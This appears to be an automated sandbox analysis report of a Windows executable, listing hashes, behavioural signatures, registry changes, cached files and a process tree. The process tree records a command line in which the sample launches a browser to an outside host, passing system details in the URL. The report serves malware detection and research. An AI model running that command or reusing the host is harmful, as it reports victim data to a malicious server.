Analysis
-
max time kernel
215s -
max time network
298s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
27/11/2022, 14:47
Static task
static1
Behavioral task
behavioral1
Sample
e0fb875547d699fc6725e213656a357ac22856b97740eba29fe2a9d8108327d0.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
e0fb875547d699fc6725e213656a357ac22856b97740eba29fe2a9d8108327d0.exe
Resource
win10v2004-20220812-en
General
-
Target
e0fb875547d699fc6725e213656a357ac22856b97740eba29fe2a9d8108327d0.exe
-
Size
143KB
-
MD5
7b6159c7656f44b31b99331d0d6de50e
-
SHA1
8120da89e2453845c27bca94ed1706556f0e3c27
-
SHA256
e0fb875547d699fc6725e213656a357ac22856b97740eba29fe2a9d8108327d0
-
SHA512
d2605a00936816cb4dbcfc60ef4014cd7b8c061a2e8ac369f5e986c075af13416764b0519a3e3038e20954bf736e3e2c6c34a9ade2ba2a28da50d0a2aa2d304c
-
SSDEEP
3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45DxqU/:pe9IB83ID5F3/
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0e102be2a03d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CFAE6141-6F1D-11ED-B964-E233F62F3A57} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003bad9e5810411a41b405bdc87c3b0eb800000000020000000000106600000001000020000000a907b84adcf669006ea349fbcea933ad34bb5013586cbd481333ea0be9700729000000000e8000000002000020000000a5591e9e0e65893313b0f493d27678d2e09f450a88781ada48087648e388006390000000f52864cf2d371a658d6a096a6dde44b4e2fd27a69308adfa1bfd53df6bd10153a1afff96231f1e712a4f82d8833f42d429e81954bf7868e4450f8650974fb77e43a807b4c1984f989bb427c761ee8d544474f5b777fa599ae1f1de03f6cfab3ff947761682cdceb3fc442b36679081e292e93ce6bf9b214df521a87c2e4372a87ccba06cb5cf79e20fcf66a3314fdc2040000000d4ff97cce91cd421bec0a43f09da595cda1bbd31718a74adafe9f4bbe605d57e10693f88e50316a45aaa9f20c42705084c20d9d48dae42772497204c0af3acfe iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003bad9e5810411a41b405bdc87c3b0eb800000000020000000000106600000001000020000000a405af063103ef566bd31cd04d89be9ae0fc9169d6ef157e5b3420d7e7dc003d000000000e8000000002000020000000ed301efdec822add59282c305b24d7301da2b49db9fa2a4173b09a7ddd7c280220000000dd2032e58d4ed214606a5a14ae7472d32f9b850b4806956094f371d48d91019c400000006039ad6f43624bc63510d98c5dc2665686fa0da1def530381790f029cf96f37f6a36a49e05ee7897e506a4ea57e3121ec05c2d826d86413debe485e28daea721 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1944 e0fb875547d699fc6725e213656a357ac22856b97740eba29fe2a9d8108327d0.exe 1880 iexplore.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1944 e0fb875547d699fc6725e213656a357ac22856b97740eba29fe2a9d8108327d0.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1880 iexplore.exe 1880 iexplore.exe 896 IEXPLORE.EXE 896 IEXPLORE.EXE 896 IEXPLORE.EXE 896 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1944 wrote to memory of 2032 1944 e0fb875547d699fc6725e213656a357ac22856b97740eba29fe2a9d8108327d0.exe 31 PID 1944 wrote to memory of 2032 1944 e0fb875547d699fc6725e213656a357ac22856b97740eba29fe2a9d8108327d0.exe 31 PID 1944 wrote to memory of 2032 1944 e0fb875547d699fc6725e213656a357ac22856b97740eba29fe2a9d8108327d0.exe 31 PID 1944 wrote to memory of 2032 1944 e0fb875547d699fc6725e213656a357ac22856b97740eba29fe2a9d8108327d0.exe 31 PID 2032 wrote to memory of 1880 2032 cmd.exe 33 PID 2032 wrote to memory of 1880 2032 cmd.exe 33 PID 2032 wrote to memory of 1880 2032 cmd.exe 33 PID 2032 wrote to memory of 1880 2032 cmd.exe 33 PID 1880 wrote to memory of 896 1880 iexplore.exe 34 PID 1880 wrote to memory of 896 1880 iexplore.exe 34 PID 1880 wrote to memory of 896 1880 iexplore.exe 34 PID 1880 wrote to memory of 896 1880 iexplore.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\e0fb875547d699fc6725e213656a357ac22856b97740eba29fe2a9d8108327d0.exe"C:\Users\Admin\AppData\Local\Temp\e0fb875547d699fc6725e213656a357ac22856b97740eba29fe2a9d8108327d0.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=5301121^&rsn=plde^&details=^|v6.1.7601x64sp1.0ws^|tt35^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"2⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://securedfileinfo.com/404.jsp?chid=5301121&rsn=plde&details=|v6.1.7601x64sp1.0ws|tt35|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p13⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1880 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:896
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD57ef66f502cb164d6d88fd779895d5e07
SHA175c68e887afe0041c18bc01dc36ae719db07a436
SHA256084f8949af79ac48c5c245e4bbeea807949d1e8e182e7d0487227231fcd97a77
SHA512419b6e5def7e1051af856ea4256235fa4f1bdbf001b54f1db9e59c44f7da8f9cfa8d63f77e35345ec6d5c3ab13de10094281d44f42a7e1fd9d92b3b68ac5ba9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize472B
MD503ad9fc0b00b5df3165dc2fb1e3b0a3e
SHA1f8243335a8bc24d989bddd346048a055e1d0bdeb
SHA256366b28d491f7fd632e31c1ce97f939555f7dcee14bb6875737ed2d3e96fa32ec
SHA512a3cd8a001366e6c1b96d2b920d56e6efd34e9b69b9805e1a2b0c270346712e22420366f8bd18bbb1dd16fa60d481ad65b13385a66a3f1fa0d7aadaaa27b99796
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize724B
MD5f569e1d183b84e8078dc456192127536
SHA130c537463eed902925300dd07a87d820a713753f
SHA256287bc80237497eb8681dbf136a56cc3870dd5bd12d48051525a280ae62aab413
SHA51249553b65a8e3fc0bf98c1bc02bae5b22188618d8edf8e88e4e25932105796956ae8301c63c487e0afe368ea39a4a2af07935a808f5fb53287ef9287bc73e1012
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD550d93b1e14d0a8c1f7031efa25d9e0ce
SHA1587cf2ff3126c9103007cc3cacaf7331646d6a9c
SHA256090bc33b9278050e5c828d5d3dafc3f521b7cced285567e86e3a02e0a7ddee6f
SHA5122c812536de805e1aa534ab7142b89a8789525ea94e66a5128fc3e2d4c32063252396f84a2e7e4d0de743d9facae427af205c11b9905c17fc376e96fd36207b11
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize402B
MD53700f0b48a95f764cf6c1f8bb8f69305
SHA1da591ed6a423e42c6131794aeefd01b5a1f7bfbd
SHA25619131e3c9b82b33d0534a392e6c409b48b02800cb046a3ff38ec02ebf51d53fb
SHA512cbd3fa2f1459706703fd458f901594b9c0d09322355684b0c461ce0dcaed3bfdb5ebeb09a7d81f5c2a76a5934f40b0f2a41b0cb7757f93064284e8f59bcf39b6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5be61330c5d3c91d814e0f601e68dcfbc
SHA18b3f1463db7aec5448ec6661713901580d9da72e
SHA256e4309dbfd0dc1cceab52e4a9cea5fa695277384f8eafce4781b9bbdd98174d63
SHA512cf1bcdbb0f1d70486048f6d104d93cf2650e1a1d0712acea8ed94c971d3daf894d7fe69517aa5defef8dcc25eebe10863826dfc620b9c3f9a047618388399d8b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize392B
MD585443048c925e8cff56131fb2fee2f03
SHA197215a7ed47f9c0e404854d8105cc5e8500e79ac
SHA2564e3797884b4bc47f6c3e65c3ffb11a09109a2236549f8076b261ec29406ba26c
SHA512c3f140cf3b951f68521f253caec0fdb7e1895d8d2667f28b35ad6e203a9986c3077d9d78fc8d940e5e4af99bdbb0f0f0f1fec666b80c59ca96e3c35ea42832ce